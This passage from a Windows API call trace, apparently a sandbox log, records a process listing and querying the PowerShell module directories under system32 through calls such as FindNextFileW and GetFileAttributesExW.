ftLastAccessTime.dwLowDateTime=0x1d3e2ea, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x8d025724, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSecurity", cAlternateFileName="NETSEC~1")) returned 1 [0218.807] FindNextFileW (in: hFindFile=0x784dac0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1dbbc19, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x2081182e, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSwitchTeam", cAlternateFileName="NETSWI~1")) returned 1 [0218.808] FindNextFileW (in: hFindFile=0x784dac0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1dbc877, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x20837aa0, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetTCPIP", cAlternateFileName="")) returned 1 [0218.809] FindNextFileW (in: hFindFile=0x784dac0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1e300dc, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x20837aa0, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkConnectivityStatus", cAlternateFileName="NETWOR~1")) returned 1 [0218.809] FindNextFileW (in: hFindFile=0x784dac0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1e30eea, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x2085dd02, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkTransition", cAlternateFileName="NETWOR~2")) returned 1 [0218.809] FindNextFileW (in: hFindFile=0x784dac0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1e319e4, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x2085dd02, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PKI", cAlternateFileName="")) returned 1 [0218.809] FindNextFileW (in: hFindFile=0x784dac0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1e92e4b, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x2085dd02, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PnpDevice", cAlternateFileName="PNPDEV~1")) returned 1 [0218.809] FindNextFileW (in: hFindFile=0x784dac0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1e93bbd, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x208aa1cb, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PrintManagement", cAlternateFileName="PRINTM~1")) returned 1 [0218.810] FindNextFileW (in: hFindFile=0x784dac0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1e950c4, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x8d04b97d, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSDesiredStateConfiguration", cAlternateFileName="PSDESI~1")) returned 1 [0218.810] FindNextFileW (in: hFindFile=0x784dac0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x185d2759, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1f64ff6, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x2091c8fd, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSDiagnostics", cAlternateFileName="PSDIAG~1")) returned 1 [0218.810] FindNextFileW (in: hFindFile=0x784dac0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x185d2759, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1f65404, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x2091c8fd, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSScheduledJob", cAlternateFileName="PSSCHE~1")) returned 1 [0218.810] FindNextFileW (in: hFindFile=0x784dac0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x185d2759, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1fb8b03, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x2091c8fd, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ScheduledTasks", cAlternateFileName="SCHEDU~1")) returned 1 [0218.810] FindNextFileW (in: hFindFile=0x784dac0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x185d2759, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1fb91fe, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x8d04b97d, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SecureBoot", cAlternateFileName="SECURE~1")) returned 1 [0218.811] FindNextFileW (in: hFindFile=0x784dac0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x185d2759, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1fb9d09, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x20968dca, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Storage", cAlternateFileName="")) returned 1 [0218.811] FindNextFileW (in: hFindFile=0x784dac0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x185d2759, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1fba32e, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x20968dca, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TLS", cAlternateFileName="")) returned 1 [0218.811] FindNextFileW (in: hFindFile=0x784dac0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x185d2759, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1fbaba9, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x8d04b97d, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TroubleshootingPack", cAlternateFileName="TROUBL~1")) returned 1 [0218.811] FindNextFileW (in: hFindFile=0x784dac0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x185d2759, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1fbbc28, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x8d04b97d, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TrustedPlatformModule", cAlternateFileName="TRUSTE~1")) returned 1 [0218.811] FindNextFileW (in: hFindFile=0x784dac0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xe6e5be8c, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x1fbcd58, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0xe966970b, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="UEV", cAlternateFileName="")) returned 1 [0218.812] FindNextFileW (in: hFindFile=0x784dac0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x185d2759, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1fbd4ae, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x8d04b97d, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VpnClient", cAlternateFileName="VPNCLI~1")) returned 1 [0218.812] FindNextFileW (in: hFindFile=0x784dac0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x185d2759, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x205dc90, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x2098f030, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Wdac", cAlternateFileName="")) returned 1 [0218.812] FindNextFileW (in: hFindFile=0x784dac0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x185d2759, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x205e730, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x2098f030, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsDeveloperLicense", cAlternateFileName="WINDOW~1")) returned 1 [0218.812] FindNextFileW (in: hFindFile=0x784dac0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x185d2759, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x205efde, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x2098f030, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsErrorReporting", cAlternateFileName="WINDOW~2")) returned 1 [0218.813] FindNextFileW (in: hFindFile=0x784dac0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x185d2759, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x205f3c7, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x2098f030, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsUpdate", cAlternateFileName="WINDOW~3")) returned 1 [0218.813] FindNextFileW (in: hFindFile=0x784dac0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0218.813] FindClose (in: hFindFile=0x784dac0 | out: hFindFile=0x784dac0) returned 1 [0218.813] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933ea14) returned 1 [0218.813] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933ea20) returned 1 [0218.813] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Modules.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\modules.psd1")) returned 0xffffffff [0218.814] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Modules.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\modules.psm1")) returned 0xffffffff [0218.814] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Modules.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\modules.cdxml")) returned 0xffffffff [0218.814] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Modules.xaml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\modules.xaml")) returned 0xffffffff [0218.814] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Modules.ni.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\modules.ni.dll")) returned 0xffffffff [0218.814] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Modules.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\modules.dll")) returned 0xffffffff [0218.814] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3d [0218.814] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker", nBufferLength=0x3d, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker", lpFilePart=0x0) returned 0x3c [0218.814] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933e9e8) returned 1 [0218.814] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\applocker"), fInfoLevelId=0x0, lpFileInformation=0x933ea64 | out: lpFileInformation=0x933ea64*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xe6e35c2e, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x1902eb1, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0xe9611c78, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0218.815] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9e4) returned 1 [0218.815] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppvClient", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3e [0218.815] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppvClient", nBufferLength=0x3e, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppvClient", lpFilePart=0x0) returned 0x3d [0218.815] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933e9e8) returned 1 [0218.815] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppvClient" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appvclient"), fInfoLevelId=0x0, lpFileInformation=0x933ea64 | out: lpFileInformation=0x933ea64*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xe6e35c2e, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x197a24f, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x76586f17, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0218.902] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9e4) returned 1 [0218.902] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Appx", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x38 [0218.902] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Appx", nBufferLength=0x38, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Appx", lpFilePart=0x0) returned 0x37 [0218.902] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933e9e8) returned 1 [0218.902] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Appx" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appx"), fInfoLevelId=0x0, lpFileInformation=0x933ea64 | out: lpFileInformation=0x933ea64*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1856002a, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x197bc54, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x206e0505, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0218.903] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9e4) returned 1 [0218.903] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x40 [0218.903] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer", nBufferLength=0x40, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer", lpFilePart=0x0) returned 0x3f [0218.903] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933e9e8) returned 1 [0218.903] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\bitstransfer"), fInfoLevelId=0x0, lpFileInformation=0x933ea64 | out: lpFileInformation=0x933ea64*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x1856002a, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x197c4d1, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x206e0505, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0218.903] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9e4) returned 1 [0218.904] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\BranchCache", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3f [0218.904] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\BranchCache", nBufferLength=0x3f, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\BranchCache", lpFilePart=0x0) returned 0x3e [0218.904] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933e9e8) returned 1 [0218.904] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\BranchCache" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\branchcache"), fInfoLevelId=0x0, lpFileInformation=0x933ea64 | out: lpFileInformation=0x933ea64*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xe6e5be8c, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x197cd93, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0xe966970b, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0218.919] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9e4) returned 1 [0218.920] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3e [0218.920] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets", nBufferLength=0x3e, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets", lpFilePart=0x0) returned 0x3d [0218.920] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933e9e8) returned 1 [0218.920] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\cimcmdlets"), fInfoLevelId=0x0, lpFileInformation=0x933ea64 | out: lpFileInformation=0x933ea64*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1856002a, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x197d5fb, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x206e0505, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0218.920] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9e4) returned 1 [0218.921] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\DirectAccessClientComponents", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x50 [0218.921] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\DirectAccessClientComponents", nBufferLength=0x50, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\DirectAccessClientComponents", lpFilePart=0x0) returned 0x4f [0218.921] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933e9e8) returned 1 [0218.921] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\DirectAccessClientComponents" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\directaccessclientcomponents"), fInfoLevelId=0x0, lpFileInformation=0x933ea64 | out: lpFileInformation=0x933ea64*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1856002a, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x19ea3b1, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x20706767, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0218.921] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9e4) returned 1 [0218.921] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Dism", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x38 [0218.921] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Dism", nBufferLength=0x38, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Dism", lpFilePart=0x0) returned 0x37 [0218.922] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933e9e8) returned 1 [0218.922] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Dism" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\dism"), fInfoLevelId=0x0, lpFileInformation=0x933ea64 | out: lpFileInformation=0x933ea64*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1856002a, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x19eb58e, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x8cfff4c6, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0218.922] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9e4) returned 1 [0218.922] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\DnsClient", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3d [0218.922] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\DnsClient", nBufferLength=0x3d, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\DnsClient", lpFilePart=0x0) returned 0x3c [0218.922] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933e9e8) returned 1 [0218.922] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\DnsClient" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\dnsclient"), 